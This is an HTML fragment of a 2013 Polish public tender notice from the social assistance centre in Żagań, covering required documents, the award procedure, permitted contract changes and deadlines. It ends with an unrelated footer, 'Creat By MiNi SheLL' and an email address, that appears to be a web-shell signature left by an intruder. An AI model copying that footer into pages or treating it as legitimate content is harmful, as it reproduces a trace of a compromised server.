<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Pełnomocnictwo dla osoby upoważnionej do występowania w imieniu wykonawcy i składania podpisu na ofercie. 
2) Oświadczenie o podwykonawcach 
3) Formularz cenowy ofertowy
Dokumenty dotyczące przynależności do tej samej grupy kapitałowej
- Lista  podmiotów należących do tej samej grupy kapitałowej zgodnie z art. 4 pkt 14 ustawy z dnia 16 lutego 2007r. O ochronie konkurencji i konsumentów (Dz. U. z 2007 r. Nr 50, poz. 331 ze zm.), o której mowa w art. 24 ust. 2 pkt 5 Pzp, albo informację o tym, że nie należy do grupy kapitałowej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a) Zmiany zakresu przedmiotu zamówienia pod warunkiem, że są korzystne dla zamawiającego lub zaszły okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, Zmiany terminu wykonania zamówienia w następujących przypadkach:
- wystąpienia /siły wyższej/. Siła wyższa oznacza wydarzenia nieprzewidywalne i poza kontrolą stron umowy,
- wystąpienia w trakcie realizacji zamówienia zmian przepisów prawa, co wpłynie na realizację zamówienia i spowoduje konieczność dostosowania opracowania do zmiany przepisów. 
Zmiany osób wskazanych w umowie zarówno po stronie Zamawiającego jak i po stronie Wykonawcy, z zastrzeżeniem, że proponowane osoby posiadają wymagane uprawnienia i kwalifikacje wymagane SIWZ.
b) w zakresie zmniejszenia  zakresu  przedmiotu zamówienia i wynagrodzenia pod warunkiem, że: 
- z niemożliwych do przewidzenia na etapie planowania zakresu zadania wykonawca  nie wykona  pewnego  zakresu  usług i nie wpłynie to  na jakość przedmiotu umowy;   
c) w zakresie zmiany wynagrodzenia pod warunkiem, że nastąpi zmiana stawki urzędowej podatku VAT;
d) w zakresie personelu   Zamawiającego/Wykonawcy wymienionego w § 18 umowy, pod  warunkiem że  wystąpiło zdarzenie losowe uniemożliwiające dalsze pełnienie funkcji  a proponowane do zastąpienia ich osoby posiadają  odpowiednie kwalifikacje;
e) w zakresie zmiany adresu/siedziby  Zamawiającego/Wykonawcy;
f) pozostałe  zmiany mogą być spowodowane:
- zmianą powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizacje zamówienia ,
- gdy zmianie ulegną zapisy umowy, przedmiotem której jest dofinansowanie tego  zadania, w tym zmiana sposobu rozliczenia umowy lub dokonywania płatności na rzecz wykonawcy na skutek zmian zawartej umowy o dofinansowanie projektu.
g) w zakresie zmiany harmonogramu usług pod warunkiem wystąpienia rodzaju zmian i okoliczności ich wystąpienia j.w.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.gminazagan.pl/zamowienia_publiczne/11/38/Przeprowadzenie_szkolen__i_badan_lekarskich_<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Żaganiu ul.Armii Krajowej 9a 68-100 Żagań  pok. nr 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.10.2013 godzina 10:00, miejsce: Gminny Ośrodek Pomocy Społecznej w Żaganiu ul.Armii Krajowej 9a 68-100 Żagań.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com